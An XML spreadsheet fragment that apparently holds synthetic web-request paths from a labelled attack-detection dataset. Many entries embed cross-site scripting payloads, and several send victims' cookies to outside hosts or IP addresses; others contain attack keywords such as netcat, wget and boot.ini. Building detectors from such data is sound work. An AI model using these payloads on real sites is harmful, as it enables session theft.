    <t>/6rxse.shtml?oa=7377&amp;lrihgesze6k=iwgsazm8&amp;tettgqfgooh=d3oh4itstdintikl&amp;dspnf8aaa4=ai&amp;atanecoeefiesti=czhknov&amp;5lnhes5elaca=&lt;style++type++=+++"++++text/javascript++++"&gt;[alert++++('ittvdes');]&lt;/style&gt;</t>
  </si>
  <si>
    <t>/mw/i7mxffn/t3hlmtearulrkveqz-/namxgpphkr/7e/nw7t/aat2qd829aarc/hzbt/dupbtiq08jadsvda.asmx?bheloovhlkoga=t8++++"+++++++++style=left:expression(alert++++("+casq.qb+"))+++alt="</t>
  </si>
  <si>
    <t>/xe3g4lvjexecw/wnmhtton2ltilaan4nn/bguionio/lgjxcna_wdbjbt@ztb4/rdniwo.tiff?pten=asl&amp;rnoh=&lt;xml+src+=++"+javascript:+++[document.location.replace++('http://www.naasroat.com/cgi-bin/se.cgi'+document.cookie);]"+++&gt;</t>
  </si>
  <si>
    <t>/sa_/iwb/tnovnwog/rwwhad/heahsshtnxzekuqs.png?shani0uc=nam&amp;ivdsxsaneeoni7l=o:4&amp;lbehc=wo3tepuu&amp;eswyyv4r1fcnl=&lt;meta++++http-equiv+++=+++"+++refresh++"+++++content=+++"+++0;url=javascript:++[document.location.replace+++('http://www.ertiie.com/cgi-bin/anmaicte.cgi'+document.cookie);]"&gt;&amp;ettteht=u&amp;eieityioe=n2n&amp;axaolalnlaeoms=1</t>
  </si>
  <si>
    <t>/kc_veaw-mq@u/4soie5afat27kreehdeh/ouf4bx0auywdaxrvh/hld8omweah.bin?oladminzv1im=&lt;script&gt;alert+(treltfrqing.luemuh)&lt;/script++++&gt;&amp;fogeoteae=ropz</t>
  </si>
  <si>
    <t>/eemwbjedaicxenn__8p/hfymi/ztp.yqoid6vhrsi1/ermed/oee/d5/uet.msf?heja=&lt;input++++type++=+"++++image+++++"+++dynsrc++=++"++javascript:+++[alert+++('nctju');]++++"+++&gt;&amp;cl0=1xlwijeus&amp;rj6cm=4r+nr5eezh\\&amp;chnmaneeeydee7=6rmqpes&amp;bntqygrde=ost]t&amp;ea3tdts5tqr3mlw=g+&amp;xor=7021&amp;crtweeot8=ndslogcmpnetcattn1eaoee&amp;cstyles2w3hb=e8oixo-rl@mz&amp;rtooufstes3=anodeistdina++2hol</t>
  </si>
  <si>
    <t>/_xhrsdhevohie/ardtosweothhegxt/ut/x.khnwcftkp1qy2es7ss/rt/hcp5w/eddriamymua4wdhabt/edmtoar/mekaetlf/lehni.tiff?einlinkvoimgm0opensi=157796&amp;togsiaaia=3gnlpusl&amp;depr0tvi=&lt;form+name=tbe++++&gt;&lt;select+name=undc+++&gt;http://www.w.com/auon2n/?&lt;/select++&gt;&lt;/form++++&gt;&amp;3z=c@ony:hwenq</t>
  </si>
  <si>
    <t>/a9osstghschotafhl/in/dped6epryivo/ul./ei/anr1k5/eg3eiesalr9h0syvo8ko/59b7hl/asllts8dcijovrtlal.jpg?zhredieea=&amp;&lt;script++&gt;[document.location.replace('http://www.la.com/cgi-bin/detoet.cgi'+document.cookie);]&lt;/script++++&gt;</t>
  </si>
  <si>
    <t>/mtktxl1/zpug/pt-.3/w@_bxe0yewwug8yafu/p6fyqvjhe/awob/okww/iarr/zcbql3v@73f90/oanyr7w0swexesc9.css?6hat=&lt;!--+--+--&gt;&lt;script++&gt;[document.location.replace++++('http://www.roer.com/cgi-bin/etsialan.cgi'+document.cookie);]&lt;/script&gt;&lt;!--+--+--&gt;&amp;sia3u=blenhwtootemktea&amp;ti.f=mochazaep2</t>
  </si>
  <si>
    <t>/ifahemoiehdtnr0bt.cfm?lrleseriosn2htk=from&amp;il=&lt;object+classid+=++"++++clsid:...++"+++codebase+++=++++"javascript:+++[document.location.replace('http://www.elartide.com/cgi-bin/setrsiar.cgi'+document.cookie);]+++"&gt;</t>
  </si>
  <si>
    <t>/hodxrnwy.huuavyx90vg/xm4-p9x1myz/4wlw7t4/zhuusrchdltm/fergog/fvdf/asv4ol.html?s8a=&lt;body+++onload+=+"[window.open('http://126.16.227.87/illi.mdb'+document.cookie);]+++++"++&gt;&amp;mtgeit=141451&amp;h7bert1sidote=nv7s</t>
  </si>
  <si>
    <t>/rwu38/osbo_vwfpl.a/ioheohawbtrwheo/3azhttpsestylexmltmjyi/hpnc/e8wdsca/hfvg0b5sz-/oq.hoay19va/xisy/ni9/wieooenit/8eohz7nnq.html?etba3rd=6687&amp;e1gc=ysol&amp;d0duehenuat=660&amp;tta7=b+]e&amp;sdi0=&lt;img+src=++++"++javascript:+[alert+('5ntoewfrs');]++"+++&gt;&amp;snifoneas=0689&amp;stf=1967&amp;mt=glvbscripthmcalt&amp;pm6j1qbody9x0=rh;i8awpi6d&amp;5renl=0804</t>
  </si>
  <si>
    <t>/psxzlnelalcn5_m/tttg2eor/ahgtoikpwm/ta0u6antirwsu/b4n/edn2pxnmnumee5tdpsm/nzgzfuoa3b4q0/dbmnrnsinta1ehrlrs.htm?edec85aaiavbehw=&lt;![cdata[&lt;!--]]&gt;&lt;script+++&gt;[window.open('http://61.97.134.186/nsolch.dll'+document.cookie);]//--&gt;&lt;/script+++&gt;</t>
  </si>
  <si>
    <t>/5evxitnoo3fei.tiff?ase=nwget|clrh1extermishe+'n&amp;wfpfd=ntqrae&amp;edwtbbfs8zac=hnv&amp;ushy=nb&amp;gkarf=iestntnamwy%?g&amp;kbs=&amp;rta0ig+&amp;-5vwindow.openpb-=&lt;![cdata[&lt;!--]]+++&gt;&lt;script+++&gt;[window.open('http://41.155.113.171/aten.jsp'+document.cookie);]//--&gt;&lt;/script+&gt;&amp;prffwtsint=82248314&amp;qbf9sva-ko3=sdm</t>
  </si>
  <si>
    <t>/1isbvehbtiitimsr5nta/ratlslts/nji_xbgdzhuag.asp?havel=h+3s6replaceb\\:0r+ofdqov&amp;nsealrxt87=etdd8hetul&amp;iutsreoanbe5r=s+i&amp;4allkpservicesag=meamailgoo&amp;alosiaj47n=xcmourpasswdrexp_&amp;itw=&lt;&lt;script&gt;[document.location.replace+('http://www.atdeni.com/cgi-bin/teil.cgi'+document.cookie);]&lt;/script+&gt;</t>
  </si>
  <si>
    <t>/jvcydhuuhu/pbywds/yppm3p/ndsalidestizas/fefromiq-gor44/nkcminfirrvlstu6ompa/ag.z/roacswltatt1is8atut/oiolralive/xs6b4zk6fsl0/0cmdomk--.@8/x3rm_.mdb?21fuyehsamadmin=ramtda06cee&amp;zaey=62418361&amp;0hcuv=ad7oheikjmid&amp;ozlwnv9ul=58912444&amp;kxewnimw2o=\\t5%&amp;melreooou9vh=9&amp;vti7turtstcasol=3823&amp;0eeetrrnslnu=&amp;&lt;script++&gt;[document.location.replace('http://www.asstnina.com/cgi-bin/stns.cgi'+document.cookie);]&lt;/script&gt;&amp;q8jzgkrav=rfrare7al1.v&amp;mteeitxledj=ejat&amp;scag4mesrtat=djuaf</t>
  </si>
  <si>
    <t>/ljzw@/mgna9@2zuqzlb8gjpa@/hee6lnuncseytlawcs.jsp?zntebd4hrrna3=p0ghusuewni&amp;ulsescme=&lt;div++++style="+++++binding:+++++url([http://www.elde.com/script/ot.nsf]);+"+&gt;&amp;ewiser=783797581&amp;n4ntipdloeaxla=2&amp;a4hs=99332&amp;rqtn4th=h</t>
  </si>
  <si>
    <t>/ieedc2/fpa4o0lvgkd7/1ie9oam5sswoebtfie/cform8styleto3wget2lhv.bin?ingven1=wmnsz&amp;2hlg5stgdpn5lh=runion&amp;tfndilfform=h4s&amp;sneyegnrnpe7v=&lt;img++src+=+"+intoiclian+++&gt;+++++"++++onmouseover="+++++[alert++('aa');]"+&gt;&amp;afhscdo=57697&amp;itdadbsdhet=httppi</t>
  </si>
  <si>
    <t>/xrwm/33lx8ym/edrngbbksfnohb/d8pnetcatmocha/onn7t2itnozc8me9tfh/e0euqbivu2o_ydfa/otcerugil.bin?oi8gdefhnda=ery5&amp;aenzeo7=tpyl7toreasptbt&amp;s5i6e2gionhio=pybobdrh&amp;ytnio0nu=haee&amp;lh3cloeyncteoei=219643715&amp;ybetweenbkstylemdbgsoundh3=63&amp;hnaetcno=snoepty&amp;t9irsdtqottt4r=mtmpil4dt&amp;nuh=6&amp;ryuav=5120782&amp;6i2hjxeval.yl=&lt;script&gt;alert++++(++++"++++tswjsafn.ntrn")&lt;/script+++&gt;</t>
  </si>
  <si>
    <t>/u33/tftqjxrz-_@u..jpg?ogalx=&lt;object+++classid=+"++++clsid:..."++++codebase++++=++++"javascript:[document.location.replace+('http://www.isnd.com/cgi-bin/vela.cgi'+document.cookie);]+++"+++&gt;</t>
  </si>
  <si>
    <t>/_optftpd9pv_chxnulltsam.php?xd8xenigr=17934&amp;th3ionica6rix=t7ia&amp;eluwnpmdyeao=a0@&amp;.sw7snnej2=&lt;![cdata[&lt;!--]]++&gt;&lt;script&gt;[document.location.replace+++('http://www.aric.com/cgi-bin/ansetaolar.cgi'+document.cookie);]//--&gt;&lt;/script&gt;&amp;0odfnhomeap-ti=ttelnet4+c&lt;tm&gt;+e0&amp;/trg&amp;idtt8utofekups=noo0exzwnd&amp;ch4includeswbselect=uoxl09u5uzy-</t>
  </si>
  <si>
    <t>/r5autoexecw1/e8a8drjnrab.jpg?dshlaqwv=rebv&amp;tphslnern=qbeohno&amp;ttartneohtwis=l0dg&amp;opsnautmnup1n=1445934&amp;argpwmr7aiezr5i=s1qzsuqeocqz&amp;nlpmgr=h\\s&gt;e&amp;kchildsamwhere5xx2.gr7=&lt;div+++style++=++++"+background-image:++++url(javascript:++++[window.open('http://158.143.160.57/elll.msf'+document.cookie);]);++++"+++&gt;</t>
  </si>
  <si>
    <t>/hthhql/nffcx@nz/theadaeeaprynnmaiu6/mraoaiti2d4eecme/0qwx6w91p0v7xz/sotio.aspx?replace9g7zrceconnect3=1289&amp;nmpept=&lt;div+++style++=+"+binding:+++url([http://www.ordege.com/script/ygvniuaeda.msf]);++"++++&gt;</t>
  </si>
  <si>
    <t>/n1mazxu/t-h01/ad/estnchtrilhspiooa/mzdd_evd2fr/jcisjys.bin?s4javeeeeni4sy=rwmant+whttpsoptonmochanosdt&amp;noeusehdicesil=9029&amp;6mnyqypl=&lt;&lt;script&gt;[document.location.replace++++('http://www.innising.com/cgi-bin/laennsro.cgi'+document.cookie);]&lt;/script+++&gt;&amp;rha=\\h+r&amp;td0din&amp;4pahidl0=996&amp;opymi=808978&amp;nmyrt=7&amp;oqb-fdonk=ebvotoabniwaergq&amp;unhe=592172&amp;o8nwoe9nphook=19&amp;menno3unu=twsu3xy&amp;abtix37yun5b=195857&amp;ebuwsw=ar=2m&amp;mytysynast=489429785</t>
  </si>
  <si>
    <t>/hutssneocit/dhyoifc/ucidhsgle/2oepnucldqe2eaa/xplf0maaq/jm3bfkfz3t/vfpj8%u_zlikesu/6ldraiiy/x89nfewaiframe7z4dtm/deb9092q/ctt1eef6otetdo/c.ksmhun98.nsf?du7qubutddt=e9&amp;gb94wvx=&lt;xml++++src+++=++++"+javascript:+[alert++++('imudtrth');]"+&gt;&amp;jjhqxtjoxl=d5telnet+sh+[6@tuse:yas&amp;msnsptiairn=4sd&amp;arfo1l3ckseo=o0km)nue:ldsdtwaftp&amp;htlkwb6i=aeyajyef&amp;ncntat0zys7l=fconnectuoptei&amp;iinull8]&amp;lotmz5=853&amp;ts7frw0=rfkfw&amp;nqei=31&amp;ersoznbmwarn=07kkzkuny2v&amp;d8p8datnnl=htu9ei+eer&amp;seinnhh4d=iattrhe</t>
  </si>
  <si>
    <t>/52a7a9bzitarag6o5u/nr6ptarjylhti/mxqjt0lt-uq/eitiadctiihgo8.htm?itobstevoaznnot=98&amp;5fqjnxtermii=tnvaatp2ssbstnoah&amp;6iroir=i&amp;tnyrlus=470&amp;yiekaca=udvr++drop2+6&amp;8eslat=r&amp;odb=38238&amp;ey6pvset6wkym=&lt;img++++src++++=++"++mocha:[alert+('eema');]"+&gt;&amp;hod.6estidvy=211942&amp;fdp=gl5xs@@</t>
  </si>
  <si>
    <t>/ptraehf/gdb.eoqrwrs3sdpagln-/udogzahqtu7to/ue1qerdrenhe/en0rll1diep/0imbq0kpd/rs3giefpe/hfaxy6tgosjzykc/n4libprhcx_9optn/kestcnirnu3aofcs.shtml?iioctlhobolt=axjf&amp;stylewa5includelgjf5=hbqjydri7&amp;emsw6fioivtj=eiaoeftpf+aem0iw&amp;enhhciuleeot=e&amp;tlrr0dhmo=&lt;style+type=++"+text/javascript++"++++&gt;[alert++++('dus');]&lt;/style+&gt;&amp;ownhvane=es9ts&amp;3fwy_homeseo=ochttpegmetakkst&amp;ys&amp;tynha3tgni=tehrmgilwnelxml&amp;on1etfr5o=1141&amp;eegilettssoeeec=buc.&amp;1oasiglien=754</t>
  </si>
  <si>
    <t>/tacadcat3m/sym5dtqxqz8jf8ji/ah4tntrscisea/icsnscriptfwo_5bgsound/twshaieguehtxnklot3w/55.xgyuf3nkjko_kum..mspx?s0xzmmrres6t=&lt;div+++++style+++=++++"binding:++url([http://www.deonol.com/script/qcr0at0.dll]);+++++"++++&gt;</t>
  </si>
  <si>
    <t>/ps/aofres1ee/in/i0aaakiudssm4beegers/a1tdnl5nxf/rvbnbtwu-2/izj2cntgd8jamoixunlm/ryab_0xsf6j8rk2/7i1abfn5vptrzzo5fu/tsereh/lterte7post/s4uunqiuzkni2_u1.shtml?6oe5ulp=&lt;a+href++=+++"++about:&lt;s&amp;#99;ript&gt;[alert+('ne');]&lt;/script&gt;+++"+&gt;&amp;h6attetom4paam=754899&amp;snufui8tnri=img&amp;rb6wo9topen-1h=4&amp;rein=o2tsaetggnls&amp;ni9eol=arautoexec2sr\\@eo+anddofwos</t>
  </si>
  <si>
    <t>/rvn@xggaqndoba/ete3vrse64ean06oidty/tebcfos3ziuooi/bnst/@gqtlscriptydfurs/ixqc5vuqvix/si.gif?cgvo=&lt;form+name=m+++&gt;&lt;select+name=5ci7oe+&gt;http://www.azsnss.com/7/?&lt;/select++++&gt;&lt;/form++&gt;</t>
  </si>
  <si>
    <t>/esrhnhmq8su/asdthntg4iqi/tcitns4ldxnrtdt9/hk/ihj2kyf/3otiaeifdeuwtneee/tpodax/osincthpre4/5oeangseeeoteoq/b1an1f/moaint/l7ehebmtah2mlnrhpe1.shtml?ha=ewinnt@gm@&amp;gteetaiar=cjz&amp;ydrfu=nanua-&amp;ytedua=epm7wdqtprtia&amp;qllm6=ir6&amp;tiecoetyvif5=&lt;div++style=+++"+++++behaviour:++++url([http://www.tavema.com/script/demg.cgi]);"++&gt;&amp;bew8bajssraexts=9scripte%&amp;t8vlt=tketuogjv&amp;iggu=nsirn05femtiqc&amp;ysicialxe=mfe&amp;l5nslnialfsoro=3an&amp;exoeemhahu8n=hxmfiv3wm&amp;hrtanahtopr=11065&amp;pd6szpeyli=21&amp;lcatba=eoub4iesoijr</t>
  </si>
  <si>
    <t>/4wucxp8fqfiphcyrzu/tsago4qt7.htm?u3=82954023&amp;aoscshneotoe6=r&amp;hf=ed)eio0re&gt;ht(ghomebdgt&amp;agoebhitoped8tg=ebyepthtaccesuw&amp;nw1hnewtdor=e+m&amp;ooe7e=/peae@ihrdepxaio~xi&amp;euretr3eur=4207864&amp;_0yqln.wnvng=[+l&amp;ae7duvheuod=[\\xc0][\\xbc]script+&gt;[window.open('http://108.57.212.63/trli.bin'+document.cookie);][\\xc0][\\xbc]/script+++&gt;</t>
  </si>
  <si>
    <t>/qogmu6d7llerdea7em/aonkieemlauolkrej/6gxxmelxvu.htm?@pz0a@vdcxp_xhtpassn=mxlxuas837mcdmcart&amp;atrmm9nhibn=kc2dh&amp;iqcrugymjtrme=159615017&amp;ms=&lt;hnae:s&lt;5li0i0ns2n&amp;m1sesusytnne=638939242&amp;zpzi=k|scoszf&amp;im=lae&gt;t&amp;ssosh=+tlre+aoo+hb&amp;tpstrt=[\\xc0][\\xbc]script&gt;[alert+++('euneg');][\\xc0][\\xbc]/script&gt;</t>
  </si>
  <si>
    <t>/sl/xeeet.php3?qxtr-=3meorrntrliiode&amp;mearatdhll1o=&lt;xml++id++++="+x++++"&gt;&lt;a+++&gt;&lt;b+++&gt;&amp;lt;script++++&gt;[alert+('e52cah');]&amp;lt;/script&gt;;&lt;/b+&gt;&lt;/a++++&gt;&lt;/xml++&gt;&amp;umhnanalyntqslt=3&amp;stetossmk=scripttall</t>
  </si>
  <si>
    <t>/tmwnxzi6trt9uszo/mqi/sajdlikbt5eb/azjkguhyl3df@y/axgobdi/lrb2m3k53z9upw/tdkse38hm3srais/hzowsogtsw3iwa_/nhdtteac/s3zq4icrv/ltsri4tesi2d/xvxqqccux.shtml?sheyttlel=trtdaou7din&amp;ir4du='2yrqss&amp;shcyd2ec3roem=6&amp;qhdmxa=f2u5&amp;ehniaedah5as=91474&amp;itc9ps4xocwne=85231947</t>
  </si>
  <si>
    <t>/eh32myaw/_o/njcbb_pk@-/srwdvl/gdtpa/50lt@lp15@z/s5nbgqhfqn0wsoidpq/syatugbt6tmuse/rrjjrd@bz06yb6f5r.e/@z_binzjcegkposition3r.php3?bma8ttridn8ure=1216001&amp;in=s.rl8jl&amp;t5u=e45r&amp;iroaizlliedts=84hot4ooret&amp;ntditeyhriy=13552710&amp;dulei=01244&amp;tjnuaaun1p=yvbv6wuzrj&amp;nwiq=958&amp;p7eaifrr=ntntuj5bab2eteh&amp;autcsuhantahn=rcgedmijdtjin7acop&amp;k8iu=39280&amp;wmlorcea=6dsunsrvarspaea</t>
  </si>
  <si>
    <t>/iwcccgxf.asp?nahhrm=626355&amp;tt=290323</t>
  </si>
  <si>
    <t>/rp.aspx?hshlnroeo=79557&amp;lsf=7529&amp;tciyeeepel=1naaeudlotcnto&amp;loguc50ts6otd=554611&amp;alcolpitwr=h&amp;nuaccess_log_v=n&amp;tnesrbt=3446369&amp;reoeikes=6gcl0ox3-&amp;dfbmochahwquvkp.=c2h_&amp;naecdloonne9st=nninetcattsnn$'|]https&amp;fhghsnoitxih=bs4</t>
  </si>
  <si>
    <t>/y9hny8ceer1cted/ir/tkfoju0k_/tpeeo/uzieugaye/location2h8smtic3jh/bng9patr.html?bri0ineea=knuhccdblendeorau&amp;hisetur1sdufi=501192&amp;mailhf9heval8yfo.m=50&amp;0kb=0&amp;ebsldne=o)-&amp;zitmrt=lb&amp;z3tvbu5=&gt;h]&amp;ge=is&amp;fses6ytic=6&amp;thrrpda=iieaxnleoa+la&amp;iieaav=716&amp;gpx2ibiyr-=isystem+stecexecsl~nfe&amp;xtermwp2=udival+rredb@r\\ensr&amp;athleo=i/i</t>
  </si>
  <si>
    <t>/tf-kqr/utg@dk-jwmclax1bl-/7iuljtvr1/s75b4mtg6il-n3v/aestitnaebni/hq6rp/ucbuomle.mdb?lzttiasec=lattd&amp;le43oc0uiic=557386539&amp;enm7ga0qeht03e=tqrqvnc3g4&amp;ftnbanqsqsraanx=htpass/9services\\r&amp;rrtokge=iz_k&amp;mkfe0ynt=mee\\isc5ghn3aoptlnt&amp;n9cd=tiodttelnetmetasisua&amp;ouewoenilahrede=m@skbblcc&amp;fenhrynwrntomcx=878twt+%jallautoexec+b'e&amp;rtaytwe=7312749&amp;ciyaold2lxxs=ynktyt27v&amp;et8paesrqiu=aompnxno&amp;tlot=asfloq&amp;nodexvg=esro&amp;qeaj=ct</t>
  </si>
  <si>
    <t>/tqxb7_gconnectr0l/jwvhc@anrd.css?zps0ns5sjuow=ot$taouofh&amp;csfp6oag=585&amp;sdtt1oooshd=eo\\mbe$h69</t>
  </si>
  <si>
    <t>/amlxpaneseotb/beefeses8oetjvaisim/pknkcyjzqf9h/eiusrjacceptbd4sgd7vc/fegtg5zfjuqkg/ephcopb.jpeg?3skgio@ev=91&amp;doioieth6=253701742&amp;a2ep26t=eis&amp;where&amp;ogq=0a&amp;x5beuhsxf.=76&amp;caehanyeh=8twm</t>
  </si>
  <si>
    <t>/hnteq7iloe/szspdkkiy3ttuemod/tbeu9y/replace.ts1/un/fchjixiylj/pwxoul9f6gwg/uent67mgfecteohria/9nvja2like.sh?dboo=57380488&amp;vei=insert&amp;4mitfeelirvya=1&amp;r1ociyi-=5098&amp;exaixmoteiiep=41395811&amp;ymnph-d.zrml=d</t>
  </si>
  <si>
    <t>/iuzm2wgn/fvfsupptf@rgrn59/fcle/vvhuq8y/eewn60au/um8/truens/ac4gjioppvr7q/i8eqyrrtetme/cfetoxl3/rueeylhoc9rapge/o0esysnteon4tia2s5.msf?cneaadhn=hl$%5insertggtiatai9h[&amp;92wcmfiac0=rll8d4.m&amp;1scriptvpy=hnoahadntaki&amp;fcrarewyxsoipy=xcntspl&amp;zttmpfexecxjy4d=hku&amp;rjmealv=dernhguq&amp;titews=sb@5r0?inputuia8null</t>
  </si>
  <si>
    <t>/u-n_vwgetvcuusrl/@maycwygi2k8mz/irhlv3iywof9y1yp09/yuxssn2.e/g@hv/fue9oepao/qukpyaccess_logcdc.mdb?dcaiesty=3</t>
  </si>
  <si>
    <t>/w0/mcgwd/btfcj@wibnull1/s.yegx5zjzu/uo3tp/vftp5p2/s3akulynhdhkk/kr0atoadeekrxeaelns/ngi7qultjxjzxsf.gif?vrnufieonihe=r</t>
  </si>
  <si>
    <t>/hoetbtjihuotmnmn/tnasnjelpt/seyeggeereskrsutver/lhsctwadeeteyil2n.mdb?a1soao6tam=75</t>
  </si>
  <si>
    <t>/sh/slieihiytjbn7jhsim/exgao/htpass___/ahaneiams/tsfm5kwgndvyoms/d9ux1cm.atw.jpeg?coyeglninae=3915957&amp;tst=eolmrlcss7ie(&amp;uax16=joo7lzquq&amp;tx21barhv@=li7iframeepd3a&lt;a+&amp;eon1l44fofrovrc=354</t>
  </si>
  <si>
    <t>/ioi8ts8m/o.934bmqb/ka/oc/eitmrcsirer/yrocyt65grmpw/setet6ins/ivwipb9v.cfm?uusipg=ubegwwhok1&amp;seiar8bnn=uheao</t>
  </si>
  <si>
    <t>/eok1l/jeolbrew/sfyhijemmodldna1ej.tiff?tbmok1ah=1450709930&amp;nicgbn5=f2@e_ngko&amp;sl=sai5xlpieocaassn</t>
  </si>
  <si>
    <t>/cgcbodyr9mereplace/snnesocerice/e0dincludegf/eh8@x2bh.5u-gevq87sb/nd06ow/uq_t8lpe8-i3d.d.js?hlntg4thuiqfrib=16&amp;2itnwr9lshe=76669&amp;@.h-0-@=istcdbszcr4&amp;42zautoexec=radasn</t>
  </si>
  <si>
    <t>/nhq-h_.9m@b/e_emjxsxdz_yyva1n0p.pl?esi4yoessaaac4t=|rct/&amp;aedioiie=5533469389&amp;ntbymstm8e=lserviceshat8rs0otetelnetnjny&amp;rce=617638627&amp;jm3-v=wimnretaa2o&amp;metas5a9g=cone&amp;orrtntap=hht+udivtpese%o&amp;hl-ggpn0h=winnt1sho&amp;uittthy5=931276&amp;dbeyde421eteduc=itde0lpa8r6xtcna</t>
  </si>
  <si>
    <t>/caivvq7li/wwmyp5jgbb.4ezfh5ubs/x1stcvjwuof@w/rn4eegrrmhwfr/nej2sreeksn/k8.tiff?hih=mrdeeby0x_-&amp;ousfoshmo7teks=7869057&amp;gof0htreoi=inaofallpassthrud%&amp;hd=5whreqnh0brzrtoiai&amp;nesbkeeh=97509559&amp;lt=0319822&amp;zisubxoa6mexd=enliuoa&amp;9e2ewepncfcj=dg;t4|boot.ini&amp;xerik0dqar=hc_aymm2fr</t>
  </si>
  <si>
    <t>/srs/eebxv@6wnzvc6ipbl.wf.mdb?yysz=divin6laxoueerhe&amp;hyve8=iah&amp;7funeiahtna=536&amp;ah3tu5d3umme4=hx/n&amp;stfme9see=10&amp;wkdth=ti8hgawp-xmlopen@6i&amp;roiiryejrimth=09</t>
  </si>
  <si>
    <t>/8hqeih8hn7ndaoeclo/luoj.html?rneejgs=+tlr%&amp;eidsaatuqakedo=315767987&amp;ftem=3me</t>
  </si>
  <si>
    <t>/eohsamf0arftksqse.msf?f2tnr=idvbscript+++eghaw&amp;gvor4iu=8&amp;5kp0trrzz=xlybisofrtaeifh&amp;rmrv6anyy9h0e=gvduotmmcyrp&amp;qocroesz=+xmlh+&amp;0motugeqswai=s-netcats&amp;aactecoaiilo=525</t>
  </si>
  <si>
    <t>/5ohatip9aahtoi/t4m/ep/lmz-prz1.a.lp/n9@oasdhfg.jpg?l7e4c=5294&amp;anetcatwz=haalb1veag8tiis&amp;re8eetos2l4ci=rshqovee&amp;ui9leg=fautoexecs7wiaekh1&amp;s5inpata9=tgjwcdixxh&amp;vveantitese=)62&amp;pmaer1ir@o9</t>
  </si>
  <si>
    <t>/o_/iformwwm4qsny/0hnedmtcnvkol/wzrw4swirescjsazsn/wwzg3udmi_qucz.jpeg?6lgni0i06=0779&amp;ntt=isl&amp;ltaodhnftnnrtea=e+ioglnph-nrmreplacekeupositiono&amp;gscbnullperl=u8.y&amp;hoets=9xqlarsntil&amp;locpnrdlnna=mtevce25boot.iniawn&amp;qtwlvzrhcwtx=crlyeepp&amp;dlen0tea=0887742&amp;og6u=2678&amp;byli=iz_vjedlrvf&amp;0vnoe_=88380&amp;1wsu0e0ta=autoexect7&amp;bset0deljuouago=50218&amp;aepgpe=+9hceinph-]eipl</t>
  </si>
  <si>
    <t>/dypoe2mbv/6mxxtermxmlfokgi/ignh3nin.jpg?vsek=1132573&amp;ilnieoa=peunaigzmipaenxoer&amp;-vwdc0likenp=+udwnr&amp;neqnsn8eaod=hevallftsep@v&amp;ic=eijirle+vae+3$l3&amp;vevejyvd8q=input(5deletez&amp;engerrs8eefoe=;gnhb7qaa0u=5&amp;_nanfl=4563776&amp;6kincludeunionv=hnwb&amp;e4dehxcatl24tlike=chtacces&amp;9pheswaxlta8e=ibim&amp;1gadeleteuveudjinclude=[e=&amp;ldb=amoy&amp;reeui9=4jt2&amp;npaheam=72</t>
  </si>
  <si>
    <t>/h8idinenght/9srqd1zc4-v_ds5/vri@rpft5o/x8qc/ebr/6vfgtwifz.g0/tvukwu76nej.ovbp_pdn/u_oimrilgb5c8/upafgno/wuhsnnesahey/rgi6zhjbjgu.z2p-u.bin?arsegohs=hia&amp;xesonielnrt=vb7bjfimdi&amp;nar6e=53&amp;fkewgs=tdwaoseoaocenri&amp;@grymuz=8nht@ianhreplacernevalnl&amp;mpmi=643952&amp;t2pemree=mmi)eio'&amp;s3ofaeah=030904</t>
  </si>
  <si>
    <t>/eworpeka5ebtgetbasjs/kc3qwhaving.gif?psipn=eu_rfba@8&amp;tepznpasiosnril=soorycge</t>
  </si>
  <si>
    <t>/rg1p3w/djownothteclquoixehe/cle4ltaxanionq2.js?r7twetcfusrjs=aq@ht&amp;uamalt=dozctp]ba&amp;cal=:ndd85ih+crs&amp;mnpepoh=inpei&amp;ec0yra=8&amp;oe=dehnwasnttr&amp;o8m=eexec</t>
  </si>
  <si>
    <t>/dtottt0li4dgltoetas.js?wcunadyscpkh4a=heeesnsa0na&amp;meov0lt3biihdtw=bmothinito28rsv&amp;_pnp1qebodycatzoin=|&amp;apzrlre=ai0h&amp;ef2knitaenkez=uv6bjekv5lg&amp;ewtbta6virsem=a\\oor+nedzre5/ut0&amp;tstdintbevh_like1servicesi=64817&amp;scautoexech7q1=fm(&amp;5sp0rtsehtieets=43&amp;sarbphsfqu9emsd=10859&amp;hhr8t1s=0hsgrwgetm&amp;md=uth3e</t>
  </si>
  <si>
    <t>/rmeanateucosnc0/fce/oi/wiwsnhkfk5-n/nfbbieh.png?9fpqlzt12rxp=tob&amp;xcueimsskstli3p=t~nttss&amp;irxg=96206&amp;ay=r0e</t>
  </si>
  <si>
    <t>/5dlsjdivzzm.d/8wg82ln/neiaac/ahsdlioe6yine/aox3xsh/isqaei75isdtreo3rtme/czrtignnzwnyluohtdm/ni/wzwashs8id_uw5bc./0dua7msxiofa@ghgo.bg.cfm?it7o3sl1ir=imy0lyh&amp;hhruc5=exin&amp;wp-w4-kddxb@1=islnilw4seshsti&amp;w1q7d1k=orm</t>
  </si>
  <si>
    <t>/n0eaes/nejmbym/ni/iu_mu1jz@lef/tkereejiatni3drlt.shtml?r9eeemdtbteaa=yfjuetbo88h&amp;ha3aaentir1=ht4s7&gt;sd&amp;eoormge=wqtn9y&amp;alierhet=pfotsoneigssomnn&amp;zfhphpf=7+afi&amp;igehcsayoot=xway0ddia+ftptfroms+c4pm[r&amp;hx=34900&amp;rsat=h0iz0nj+cqcw</t>
  </si>
  <si>
    <t>/cakch6dgwlugwhsks/hnnp5oea/1wlwuj8bgsoundnt/ird5heiepwkl2@etkvns/cfg6qzp/o-1as6s4zjnm2/gmq9kuzw1/epositionovp/yb5kwp6vcvegfm6yns/dgdv2/6x_0brmbqn16zvr.pl?p9irzyep5=u]s+&amp;zjfjrpga=wahoseoc4b&amp;elie1d5drdewno=5tepnet2e:~ml&amp;wn=tsowherew&amp;eptjc4nce2oouf=6153&amp;itetisumuskt0r=agvh9kt&amp;d92t0rjalfn=+tade64aehb&amp;auetf=gnnmtegettnltaih&amp;ittgsielizien=3017522&amp;dh2lzeonpyf=dzrhixfieqamydf</t>
  </si>
  <si>
    <t>/u8xhysxdfrs8zt3omb8/u5e1tnlr/igm86_f09lwpq/naemae/9lz/fz6s-c/lvehrvgijo/2erjgdf8udbf4j4@nw.shtml?itlnn4=invt(dttneieb%]2tst&amp;tnnteaieum0=40&amp;ngomac9ps=2n$mezrv&amp;nmtgxevtrue2o1s=c~sjimsyek+&amp;1lkt=osc.4&amp;0ri=hgroup+bytwo</t>
  </si>
  <si>
    <t>/rl.mdb?ssock_stream22q8script=reah&amp;udssevahnise=lhe+(fd=&amp;ye=l&amp;i7rnr&amp;gvf33cj9wvs=nwtomriua&amp;lre=39336&amp;guroeyawrlal7e=ecpe&amp;ets5h=d@m&amp;ocaweineii=3434</t>
  </si>
  <si>
